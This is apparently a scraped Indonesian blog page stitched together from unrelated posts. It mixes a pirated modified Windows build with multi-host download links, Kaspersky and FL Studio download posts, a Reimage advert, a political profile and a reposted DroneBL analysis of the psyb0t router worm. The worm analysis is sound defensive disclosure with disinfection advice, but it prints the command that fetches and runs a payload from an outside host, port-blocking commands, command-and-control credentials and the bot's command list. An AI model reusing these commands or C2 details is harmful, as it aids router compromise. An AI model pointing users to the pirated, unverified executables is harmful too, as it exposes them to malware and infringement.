Just Priview

Updated Newest Hotfixes to help windows faster and optimization.
Download: Windows Diamond Ultimate 2010 (Version 3.0) (08/12/2009)
Windows Diamond Ultimate 2010 Containt:
- Windows Diamond Ultimate 2010 (Newest hoffixest + Sata Driver for Laptop + more usefull softwarez).
- Read/Copy Files From NTFS Volumes To FAT32/16 Drives
- Partition Magic 8.05
- Norton Ghost 11.5.0.2165
- HDAT 2 ALL

Software
Mozilla Firefox v3.5.2 + Plugins
WinRAR v3.9.5 Plus (10 Theme)
Shock 4 Way 3D v1.29
Diamond Circle Dock v0.92
Diamond Click star 2 v1.0.5e
Diamond ViStart v2.0
Diamond Sidebar v4.0
Diamond Rocket Dock v1.3.5
Diamond Drive Icon v1.4
Diamond Sceen Savers v4.0
Diamond Cursors AIO v1.9
Diamond TrueTransparency v1.0
Diamond Superbar v1.0.0.1182

Hostfix Update 12/08/2009:
Hotfix Update (209):
KB817688 KB887606 KB889320 KB897571 KB898461 KB909520
KB915800 KB916157 KB922120 KB923561 KB927436 KB928788
KB929399 KB929773 KB932390 KB932716 KB933547 KB934401
KB935551 KB935552 KB938759 KB939209 KB939683 KB940159
KB940648 KB941569 KB942288 KB943232 KB943729 KB944043…

This pack contains:
Copy To/Move To Context Menu Shell Extension
HashTab 2.1.1
Microsoft Calculator Plus 1.0 (Replaces calc.exe)
Microsoft HighMAT CD Writing Wizard (KB831240)
Microsoft Makecab 6.0.6001.22192 (From Windows Installer 4.5 SDK, doesn’t mess up file dates)
Microsoft OpenType Font Properties Extension 2.30
Microsoft Power Calculator PowerToy 1.0
ModifyPE 0.81
Microsoft TweakUI PowerToy 2.10
Unlocker 1.8.7
UPX 3.03
BootSafe v2.0.1000
Bootvis v1.3.37.0
ClearType PowerToy
CPU-Z v1.51
Dial-a-Fix v0.60.0.24
TweakUI PowerToy v2.1
Windows Task Manager
WinUpdatesList v1.23
User Accounts 2 CPL
AccessEnum
Autologon
Autoruns
Bluescreen Screensaver
CacheSet
Contig
DebugView
Diskmon
Filemon…

Note : After install complete, at first login, you will see a report box, click Don’t send (Because Driver for VGA Card have been not installed).Install your VGA Driver.

Windows Diamond Ultimate 2010. system requires:
CPU: P4 2.0 Ghz (upper)
Ram: 1 Gb (upper)
VGA: 64 Onboard (upper)
HDD: 20 Gb (upper)

Size : 697 MB

Screenshots:

This image has been resized. Click this bar to view the full image. The original image is sized 800×500.

This image has been resized. Click this bar to view the full image. The original image is sized 800×600.

This image has been resized. Click this bar to view the full image. The original image is sized 800×500.

Download:

http://hotfile.com/dl/10087460/658d62e/Windows_Diamond_Ultimate.part1.rar.html
http://hotfile.com/dl/10107583/ef13dfe/Windows_Diamond_Ultimate.part2.rar.html
http://hotfile.com/dl/10108895/4127b2e/Windows_Diamond_Ultimate.part3.rar.html
http://hotfile.com/dl/10087552/4d9e5c7/Windows_Diamond_Ultimate.part4.rar.html
http://hotfile.com/dl/10090819/84dcd6c/Windows_Diamond_Ultimate.part5.rar.html
http://hotfile.com/dl/10091901/d2b032f/Windows_Diamond_Ultimate.part6.rar.html
http://hotfile.com/dl/10091432/5db9a55/Windows_Diamond_Ultimate.part7.rar.html

http://rapidshare.com/files/266514118/Windows_Diamond_Ultimate.part1.rar.html
http://rapidshare.com/files/266632435/Windows_Diamond_Ultimate.part2.rar.html
http://rapidshare.com/files/266640231/Windows_Diamond_Ultimate.part3.rar.html
http://rapidshare.com/files/266519584/Windows_Diamond_Ultimate.part4.rar.html
http://rapidshare.com/files/266536020/Windows_Diamond_Ultimate.part5.rar.html
http://rapidshare.com/files/266538141/Windows_Diamond_Ultimate.part6.rar.html
http://rapidshare.com/files/266537762/Windows_Diamond_Ultimate.part7.rar.html

http://www.megaupload.com/?d=FFEM0IFI
http://www.megaupload.com/?d=0I6MR56I
http://www.megaupload.com/?d=POB4GYU1
http://www.megaupload.com/?d=ZUFORDZP
http://www.megaupload.com/?d=9UPD761N
http://www.megaupload.com/?d=X5GGCR59
http://www.megaupload.com/?d=48PN5BKG

Mediafire:

http://www.mediafire.com/download.php?i4ekm20z2no
http://www.mediafire.com/download.php?0hxmzmtynoj
http://www.mediafire.com/download.php?mycykjhnzzo
http://www.mediafire.com/download.php?tytizi1tgii
http://www.mediafire.com/download.php?3zzwmztyygh
http://www.mediafire.com/download.php?kxyauzm3ity
http://www.mediafire.com/download.php?mymduz220yn

Kaspersky Internet Security 2010 – the backbone of your PC’s security system, offering protection from a range of IT threats. Kaspersky Anti-Virus 2010 provides the basic tools needed to protect your PC.

Kaspersky Internet Security 2010 – the all-in-one security solution that offers a worry-free computing environment for you and your family. Kaspersky Internet Security 2010 has everything you need for a safe and secure Internet experience. Kaspersky Internet Security 9.0 – is a new line of Kaspersky Labs products, which is designed for the multi-tiered protection of personal computers. This product is based on in-house protection components, which are based on variety of technologies for maximum levels of user protection regardless of technical competencies. This product utilizes several technologies, which were jointly developed by Kaspersky Labs and other companies; part of them is implemented via online-services.

Our products for home and home office are specifically designed to provide hassle-free and quality protection against viruses, worms and other malicious programs, as well as hacker attacks, spam and spyware.

During product preparation several competitor offerings were considered and analyzed – firewalls, security suites systems, which position themselves as proactive in defence and HIPS systems. Combination of in-hosue innovative developments and results from analysis gathered through the industry allowed to jump onto a new level of protection for personal users, whereby offering even more hardened and less annoying computer protection from all types of electronic threats – malicious programs of different types, hacker attacks, spam mailings, program-root kits, phishing emails, advertisement popup windows etc.

Kaspersky Internet Security 2010 All Features:

Essential Protection:
* Protects from viruses, Trojans and worms
* Blocks spyware and adware
* Scans files in real time (on access) and on demand
* Scans email messages (regardless of email client)
* Scans Internet traffic (regardless of browser)
* Protects instant messengers (ICQ, MSN)
* Provides proactive protection from unknown threats
* Scans Java and Visual Basic scripts

Extended Protection:
* Two-way personal firewall
* Safe Wi-Fi and VPN connections
* Intrusion prevention system
* Intelligent application management and control
o automatically configured application rules
o security rating is assigned to unknown applications
o access to the user’s resources and data is restricted for unknown applications

Preventive Protection:
* Scans operating system and installed applications for vulnerabilities
* Analyzes and closes Internet Explorer vulnerabilities
* Disables links to malware sites
* Detects viruses based on the packers used to compress code
* Global threat monitoring (Kaspersky Security Network)

Advanced Protection & Recovery:
* The program can be installed on infected computers
* Self-protection from being disabled or stopped
* Restores correct system settings after removing malicious software
* Tools for creating a rescue disk

Data & Identity Theft Protection:
* Disables links to fake (phishing) websites
* Blocks all types of keyloggers
* Virtual keyboard is provided for safely entering logins and passwords
* Prevents the theft of data exchanged via secure connections (HTTPS / SSL)
* Blocks unauthorized dial-up connections
* Cleans up any traces of user activity (deletes temporary files, cookies etc.)

Content Filtering:
* Parental control
* Improved antispam protection (plugins for Microsoft Outlook, Microsoft Outlook Express, The Bat!, Thunderbird)
* Blocks banners on web pages

Usability:
* Automatic configuration during installation
* Wizards for common tasks
* Visual reports with charts and diagrams
* Alerts provide all the information necessary for informed user decisions
* Automatic or interactive mode
* Round-the-clock technical support
* Automatic database updates
download :
http://kaltimfree.com/blog/download/kis_9.0.0736.exe/
http://kaltimfree.com/blog/download/kav_9.0.0736.exe

What is FL9?FL Studio 9 is a complete software music production environment, representing the culmination of more than 10 years of sustained & focused development. FL9 is the fastest way from your brain to your speakers.
FL Studio is a full-featured, open architecture, music production environment capable of audio recording, composing, sequencing and mixing, for the creation of professional quality music. The FL Studio philosophy is creative freedom:
FL Studio supports WAV, MP3, OGG, WavPack, AIFF, and REX audio formats.

More INFO

http://flstudio.image-line.com/documents/whatsnew.html

Download
RAPiDSHARE

untung aja gak sempet di take over pihak lain,, tengs om dru,,,,

dan akhirnya hari ini KALTIMFree.com udah bisa kita acces lagi,,, makasih buat temen KF yang mau bantuin bayar,,

makasih but Putra @ ODOD yang mau bantuin bayar domain KALTIMfree,,,, jasamu gak akan terlupakan kawan

Reimage

reimage kaltimfree

Apakah Reimage?

Reimage adalah layanan berbasis web yang dijalankan melalui ActiveX perbaikan kerusakan sistem Windows XP agar sistem operasi Anda akan berjalan seperti ini pertama kali diinstall. Windows XP Reimage melakukan perbaikan komputer jarak jauh melalui jaringan internet atau khusus dan PC dalam Windows XP yang tidak akan reboot.

Reimage melakukan nya bekerja dengan menerapkan standar yang ditetapkan dari tindakan sesuai dengan masalah dalam sistem XP. Dengan referensi dengan lebih dari 4 juta registry dan komponen repositori, Reimage mencari komponen atau file yang hilang, objek baru atau file yang diubah oleh virus, malware atau perangkat lunak berbahaya lainnya. Kemudian, Reimage akan mengganti benda yang hilang dengan database repositori dan mengembalikan layanan atau komponen ke keadaan semula. Komponen yang baru atau file baru, Reimage akan menonaktifkan mereka sehingga mereka tidak dapat membahayakan lagi. Tidak seperti built-in Windows XP system restore, Reimage tidak mempengaruhi data pengguna atau aplikasi pada sistem operasi.

Berikut adalah beberapa fitur Reimage:

1. Mengurangi waktu perbaikan – Hemat waktu Reimage karena mudah digunakan dan tidak perlu teknisi panggilan Anda setiap kali Anda memiliki masalah PC .
2. Mengoptimalkan mesin Windows XP – Reimage akan memberikan diagnosis untuk PC Anda, termasuk penggunaan prosesor, penggunaan memori, penggunaan hard disk, penggunaan Windows Pager. Kemudian memberikan Anda satu set rekomendasi untuk PC anda.
3. Perbaikan segala macam masalah pada PC Windows XP – Ini termasuk perbaikan registry, driver perbaikan, untuk memeriksa masalah keamanan, dan menonaktifkan semua jenis program jahat pada PC anda.
4. Tidak diperlukan instalasi – Karena Reimage digunakan berbasis web ActiveX, Anda dapat berjalan di mana saja asalkan terinstal Internet Explorer .

Untuk Reimage Home Edition, hal ini juga dilengkapi dengan sebuah PC booster gratis yang mampu mempercepat program paling umum pada PC anda. Sayangnya, Reimage hanya tersedia untuk Windows XP.

Anda bisa mengetahui lebih lanjut tentang Reimage di Reimage blog atau anda dapat melihat video perusahaan: Bagaimana teknologi bekerja.

Rasanya tidak habis-habis jika membicarakan sosok AWang Ferdian Hidayat, Sebagai pelopor kaum muda kaltim

Anggota DPD-RI dapil Kalimantan Timur. Figur pemimpin daerah termuda yang bersih tanpa konflik apapun, energik dan berdedikasi tinggi.

KEMENANGAN MUTLAKNYA di kancah peserta demokrasi pada pemilihan Dewan Perwakilan Daerah Republik Indonesia (DPD-RI) yang di warnai dengan pemilihan wakil rakyat di awal 2009 lalu menjadikan bukti bahwa masyarakat KALTIM sangat mengenal figur supel dan murah senyum ini.

Terlebih di Kabupaten KUTAI KARTANEGARA (KUKAR) yang menjadi tempat dimana leluhurnya dilahirkan dan dimakamkan, adalah daerah yang paling besar memberikan sumbangsih suara. Dari total suara yang di dapat, yaitu 216.176 suara, lebih dari 60 persennya berasal dari kabupaten terkaya di Indonesia ini. Tak pelak, kemenangan yang boleh dikata sangat gemilang itu memberikan semangat tersendiri bagi masyarakat. Terutama tim sukses yang selama ini berkerja mensosialisasikan figur yang dianggap mampu meredam konflik di kabupaten yang sering di landa kisruh kepentingan tersebut.
Mengingat Pemilihan Bupati (Pilbup) yang rencananya digelar pada tahun 2010 mendatang gaungnya kian nyaring, mulai dari pendukung hingga sejumlah tokoh serta perwakilan masyarakat lainnya pun mendatangi Awang Ferdian dan mendesak agar dirinya bisa ikut maju ke bursa pencalonan.
Saat di wawancarai di kantor Pusat AFC baru-baru ini, lelaki yang juga pernah menjadi calon walikota Samarinda ini mengaku tidak bisa menolak aspirasi masyarakat yang menginginkannya untuk maju dalam Piklada KUKAR.”MAsyarakat menilai saya adalah figur yang dapat mengayomi masyarakat dan tidak empunyai kepentingan apapun selain hanya kepentingan rakyat“.
Memang rasanya tidak berlebihan bila masyarakat menaruh harapan banyak pada sosok Awang Ferdian Hidayat. Meski masih muda, namun beliau telah memiliki pengalaman di dunia politik dan malang melintang di sejumlah organisasi. Terlebih jika nantinya AWang ferdian benar-benar terpilih sebagai Bupati Kutai kartanegara.

Figur Awang Ferdian Hidayat patut untuk diperhitungkan lantaran selain putra asli daerah, Awang Ferdian Hidayat juga mempunyai komitmen tinggi untuk melakukan perubahan-perubahan di Kukar, yang muaranya untuk mensejahterakan masyarakat.
Simbol dukungan dari masyarakat Kutai Kartanegara untuk majunya sosok Awang Ferdian Hidayat dalam panggung Pilkada Kukar saat ini pun mulai bermunculan, sebut saja melalui komunitas Awang Ferdian Fans Club (AFFC) yang mendapatkan respon sangat besar dar masyarakat, meski komunitas itu sendiri baru terbentuk 2 minggu lalu.
Bahkan, Awang Ferdian Hidayat, Minggu (12/7) sore kemarin berkesempatan bertatap muka dengan para fansnya yang tergabung dalam AFFC di Hotel Lesung Batu Tenggarong, hadir pula Chairul Anwar Yusuf, salah satu tokoh masyarakat Kukar yang saat ini duduk sebagai Kepala Badan Ketahanan Pangan Kukar.
Muhib Bin Ali pendiri komunitas AFFC, menilai bahwa figur Awang Ferdian Hidayat adalah figur muda yang tepat untuk memimpin Kukar melalui Pilkada 2010 mendatang. Selain memiliki komitmen jelas untuk membawa Kukar kearah lebih baik, Awang Ferdian Hidayat juga banyak mendapat dukungan dari masyarakat Kutai Kartanegara.
“Awang Ferdian Hidayat adalah seorang politisi yang sudah mempunyai pengalaman yang matang, dan apabila maju calon bupati, pendampingnya tentu harus diimbangi dengan sosok yang sudah berpengalaman dalam birokrasi,” kata Muhib Bin Ali.
Muhib menyatakan bahwa AFFC menilai figur yang tepat untuk mendapingi sosok Awang Ferdian Hidayat adalah Chairul Anwar Yusuf sebagai Calon Wakil Bupatinya. Sosok Chairul Anwar Yusuf yang sekarang ini menjabat sebagai Kepala Badan Ketahanan Pangan Kukar, adalah sosok low profile dan birokrat tulen, yang jika diduetkan dengan Awang Ferdian Hidayat akan menjadi pasangan yang serasi.
“Pak Awang adalah seorang politisi muda, pengalaman bidang politik sudah tak kita ragukan lagi, dan sudah sepatutnya yang mendapingi beliau nanti adalah sosok birokrat, sehingga pasangan ini jika disatukan akan memberikan kekuatan tersendiri untuk membawa Kukar kearah lebih baik. Dan kami dari AFFC melihat sosok yang tepat mendapati pak Awang Ferdian adalah Chairul Anwar, beliau low profile, seperti Boediono,” ujar Muhib Bin Ali.
Muhib Bin Ali juga menambahkan, kalau sosok Chairul Anwar Yusuf dalam kancah birokrasi sebagai birokrat bersih, yang tentunya sejalan dan sekomitmen dengan Awang Ferdian.
Sementara itu tokoh Kutai Selatan Jumarin Tridipada yang saat ini masih menjabat sebagai Sekretaris Jendral Kutai Selatan, berharap besar agar Awang Ferdian Hidayat maju sebagai Calon Bupati Kutai Kartanegara, karena melihat bahwa sosok Awang Ferdian telah dikenal oleh masyarakat pesisir Kukar.
“Selain ayahandanya Awang Ferdian yakni bapak Awang Faraoek yang tetap komitmen dalam pembentukan Kabupaten Kutai Selatan, kami menyakini bahwa Awang Ferdian Hidayat juga mempunyai komitmen besar mendorong terbentuknya segera Kabupaten Kutai Selatan. Saya yakin, figur yang mampu membawa perubahan untuk Kukar adalah Awang Ferdian, seperti yang diharapkan masyarakat di Kukar maupun di pesisir selama ini,” terang Jumarin.
Jumarin menilai kalau Kukar saat ini dalam kondisi sakit. Beragam masalah muncul, dan perlu ada penyelesaian segera. Dengan kondisi yang sakit tersebutlah, diharapkan akan hadir pemimpin yang dapat menyatukan para elit politik, menyatukan persepsi meski ada perbedaan menuju Kutai Kartanegara kearah yang lebih baik dari sekarang.
“Kalau di Amerika ada tokoh muda yang bernama Obama, di Kukar saya kira ada tokoh muda yang enerjik yang siap membangun Kukar yakni pak Awang Ferdian, kalau pada Pilpres kemarin ada calon wakil Presiden yang low profile yakni pak Boediona, maka di Kukar juga ada calon wakil Bupati yang low profile yaitu pak Chairul Anwar Yusuf. Pasangan ini menurut kita adalah pasangan tepat untuk memimpin Kutai Kartanegara,” ungkap Jumarin Tripada.

dan pastinya awang ferdian mendapat dukungan luas di KUKAR

Update 4 — Before you read anything else, read this

Am I Vulnerable?

You are only vulnerable if:

• Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
• Your device also has telnet, SSH or web-based interfaces available to the WAN, and
• Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.

Any device that meets the above criteria is vulnerable, including those built on custom firmware such as OpenWRT and DD-WRT. If the above criteria is not met, then the device is NOT vulnerable.

How can I tell if I have been infected?

Ports 22, 23 and 80 are blocked as part of the infection process (but NOT as part of the rootkit itself, running the rootkit itself will not alter your iptables configuration).

If these ports are blocked, you should perform a hard reset on your device, change the administrative passwords, and update to the latest firmware. These steps will remove the rootkit and ensure that your device is not reinfected.

Public Relations and Us

We deal with botnets and abusive hosts, not PR.

We are quite concerned that not many people have (there have been a few, but the majority of the people have used the ’slashdot version’) contacted us, or anybody else working on this for further information or to verify if their conclusions written in their articles were correct. Many articles described this as a “end of the world, all routers are vulnerable” thing. This is simply not the case. We would prefer if you contact us if you do not understand fully now.

Commentary found on the Internet about “this rootkit is fake”, or “it doesn’t run on my ubuntu box”, or “UPX doesn’t unpack it”

Ok, first off, this binary is for MIPS-based processors, which are not X86 (the kind used in the average PC).

Secondly, this binary IS packed with UPX, but he has stripped the headers necessary to decompress it. A little time with a hex editor can get you the decompressed binary, as can just running it in qemu.

Commentary on “why isnt Law Enforcement involved”

Many botnet investigations are handled by the private sector. This is one of those investigations. If a Law Enforcement agency is interested in our work, or the work of anybody else researching this worm, then they should be encouraged to email admins@dronebl.org about it. If we have any useful information they don’t already know, we will be more than happy to provide it.

Commentary on “is device X vulnerable?”

Short answer: We don’t know. There are so many devices out there that we could not possibly know.

Your best bet would be to take action to upgrade the device firmware and secure any passwords if there is concern that the device may be vulnerable. Such actions will help to avoid exploitation by the worm.

The worm info itself

We have come across a botnet worm spreading around called “psyb0t”. It is notable because, according to my knowledge, it:

• is the first botnet worm to target routers and DSL modems
• contains shellcode for many mipsel devices
• is not targeting PCs or servers
• uses multiple strategies for exploitation, including bruteforce username and password combinations
• harvests usernames and passwords through deep packet inspection
• can scan for exploitable phpMyAdmin and MySQL servers

Vulnerable devices

• any linux mipsel routing device that has the router administration interface or sshd or telnetd in a DMZ, which has weak username/passwords (including openwrt/dd-wrt devices).
• possibly others

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for “busybox ftpget”, and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.

IRC Botnet

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: \[NIP\]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

strcpy.us.to control domain nameservers: ns1.afraid.org, ns2.afraid.org, ns3.afraid.org, ns4.afraid.org [suspended]

IRC Commands

.mode   - sets a mode on a channel
.login        - login to the bot
.logout                 - logout
.exit                   - causes the botnet to exit and remove itself
.sh            - runs  on shell
.tlist                  - lists all threads
.kill                   - kills a thread
.killall       - kills threads by glob-match pattern
.silent                 - makes the bot stop sending to channel
.getip                  - show bot WAN ip address
.visit             - flood URL with GET requests
.scan                   - scans a random range for vulnerable routers/modems
.rscan           - scans a CIDR range for vulnerable routers/modems
.lscan                  - scans the local subnet for vulnerable routers/modems
.lrscan                 - scans a range in the local subnet for vulnerable routers/modems
.split        - splits the workload of a scan thread into two threads
.sql        - scans for vulnerable MySQL servers and attempts to make them download and run URL
.pma        - scans for vulnerable phpMyAdmin and attempts to make them download and run URL
.sleep            - makes the bot sleep for the given time
.sel                    - ???
.esel                   - skip next part if locale is not X
.vsel                   - skip next part if version is not X
.gsel                   - ???
.rejoin [delay]         - cycle the channel after delay
.upgrade                - download new bot from the distribution site
.ver                    - returns "[PRIVATE] PSYB0T" followed by version
.rs                     - returns detected rapidshare URLs and logins
.rsgen                  - generate a bogus rapidshare login page and force user to browse to it
.rsloop           - runs a webserver i/o loop on  as a thread
.wget              - runs wget with the provided url
.r00t                   - attempts to raise effective UID using vmsplice() exploit (seems pointless)
.sflood      - sends SYN packets to IP
.uflood      - sends UDP packets to IP
.iflood      - sends ICMP pings to IP
.pscan              - portscans IP
.fscan              - tries to bruteforce FTP server at IP

Commentary

As stated above, this is the first known botnet based on exploiting consumer network devices, such as home routers and cable/dsl modems. Many devices appear to be vulnerable. The size of this botnet so far cannot be determined.

The author of this worm has some sophisticated programming knowledge, given the nature of this executable.

Action must be taken immediately to stop this worm before it grows much larger.

We came across this botnet as part of an investigation into the DDoS attacks against DroneBL’s infrastructure two weeks ago, and feel that this botnet was the one which flooded DroneBL.

We are looking into finding out more information about this botnet, and its controller. If you have any information, we would like to know.

If you intend to disassemble this botnet, you should note it’s UPX-compressed.

I estimate that at the time of writing, there is at least 100,000 hosts infected.

I suspect that the .sql and .pma exploit tools are used for finding more controllers. But I do not have the controller payload.

This technique is one to be extremely concerned about because most end users will not know their network has been hacked, or that their router is exploited. This means that in the future, this could be an attack vector for the theft of personally identifying information. This technique will certainly not be going away.

Update

Some prior research about an earlier version has been found here. This research was done by Terry Baume.

Update 2

This botnet has apparently been shutdown:

* Now talking on #mipsel
* Topic for #mipsel is: .silent on .killall .exit ._exit_ .Research is over:
 for those interested i reached 80K. That was fun  , time to get back to the real life... (To the DroneBL guys:
 I never DDOSed/Phished anybody or peeked on anybody's private data for that matter)
* Topic for #mipsel set by DRS at Sun Mar 22 17:02:15 2009

While this information may or may not be true, we have received HTTP-based floods from IPs participating in this botnet.

We are still interested in this DRS person. If you have any information, please provide it to DroneBL. We will not disclose our sources.

We also hope that the router and modem manufacturers which have been monitoring this incident take note of it and secure their firmware from future attacks.

Update 3 (Disinfection Instructions)

We have been getting asked a lot about disinfection instructions.

To disinfect, simply powercycle your device and take appropriate action to lock it down, including the latest firmware updates, and using a secure password.

nenolod / Mar-22-2009 07:32:31 GMT